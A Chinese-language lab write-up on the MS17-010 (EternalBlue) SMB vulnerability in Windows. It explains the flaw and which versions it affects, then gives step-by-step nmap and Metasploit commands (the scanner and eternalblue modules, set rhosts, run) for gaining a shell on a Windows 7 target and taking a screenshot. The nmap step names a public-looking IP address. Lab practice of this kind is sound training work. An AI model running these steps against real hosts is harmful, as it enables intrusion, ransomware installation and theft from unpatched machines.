靶机来源:ed2k://|file|cn_windows_7_ultimate_x64_dvd_x1566043.iso|3341268992|7DD7FA757CE6D2DB78B6901F81A6907A|/
漏洞介绍
微软漏洞编号
ms17-010
漏洞原理
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
SMB协议
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间 共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上, SMB使用TCP139端口和TCP445端口。
影响版本
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
利用条件
windows版本符合在上述的影响版本中,并且开启445端口并且系统未打MS17-010补丁
漏洞利用过程
使用nmap扫描主机端口
nmap 54.222.188.173
可以看到主机开启了445端口
打开MSF框架
输入msfconsole
查找漏洞模块
search ms17-010
auxiliary/scanner/smb/smb_ms17_010 为永恒之蓝扫描模块
exploit/windows/smb/ms17_010_eternalblue 为永恒之蓝攻击模块
使用扫描模块对靶机进行漏洞扫描
使用扫描模块 use auxiliary/scanner/smb/smb_ms17_010 设置目标主机地址 set rhosts 192.168.0.114 执行扫描 run
提示: Host is likely VULNERABLE to MS17-010!
说明存在永恒之蓝漏洞
使用攻击模块进行攻击
切换到攻击模块 use exploit/windows/smb/ms17_010_eternalblue 设置目标ip set rhosts 192.168.0.114 攻击 run
由于在攻击的过程中出现了一些问题,我更换了kali操作系统进行攻击
执行完之后,输入shell,进入cmd终端
按ctrl+c退出cmd终端
截取屏幕
screenshot